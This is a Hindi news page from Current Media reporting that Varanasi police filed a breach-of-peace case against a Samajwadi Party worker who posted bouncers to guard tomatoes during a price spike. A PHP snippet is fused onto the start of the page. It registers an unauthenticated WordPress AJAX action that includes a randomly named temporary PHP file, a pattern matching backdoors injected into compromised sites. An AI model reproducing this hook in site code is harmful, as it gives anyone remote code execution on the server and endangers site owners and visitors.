if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }बाउंसरों की सुरक्षा में टमाटर बेचने पर वाराणासी पुलिस ने मुकदमा दर्ज किया - Current Media

बाउंसरों की सुरक्षा में टमाटर बेचने पर वाराणासी पुलिस ने मुकदमा दर्ज किया

वाराणसी । उत्तर प्रदेश के वाराणासी में टमाटरों की सुरक्षा में बाउंसर तैनात करने वाले स्थानीय समाजवादी पार्टी नेता समेत पांच लोगों के खिलाफ शांति भंग का मुकदमा दर्ज किया गया है। द टेलीग्राफ की रिपोर्ट के मुताबिक वाराणासी के लंका थाने में ये मुकदमा दर्ज किया गया है। स्थानीय पुलिस अधिकारी मिथिलेश यादव के मुताबिक पांच लोगों ने बाजार में शांति भंग की जिसके लिए मुकदमा दर्ज किया गया है। हालांकि पत्रकारों के सवालों पर उन्होंने और अधिक जानकारी नहीं दी।

वहीं ये अनूठा प्रदर्शन कराने वाले समाजवादी पार्टी कार्यकर्ता अजय यादव ने कहा है कि ये मुकदमा राजनीति से प्रेरित है और योगी आदित्यनाथ सरकार की बदले की कार्रवाई है। अजय यादव ने कहा कि सरकार टमाटर के दाम पर नियंत्रण तो नहीं कर सकती, मुझे गिरफ्तार जरूर करा सकती है। भारत में पिछले दो सप्ताह के दौरान टमाटर के दाम तेजी से बढ़े हैं. कई शहरों में टमाटर सौ रुपये प्रति किलो से अधिक के दाम पर बिक रहे हैं। अजय यादव ने ये अनूठा प्रदर्शन शनिवार को किया था जब प्रधानमंत्री नरेंद्र मोदी अपने लोकसभा क्षेत्र वाराणासी के दौरे पर थे। अजय यादव के अलावा सब्जी दुकानदार, दो बाउंसरों और दुकान पर काम करने वाले एक व्यक्ति के खिलाफ ये मुकदमा दर्ज किया गया है। अजय यादव ने शनिवार को सब्जी की दुकान पर टमाटर बेचे थे और टमाटरों की सुरक्षा के लिए दो बाउंसर तैनात किए थे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …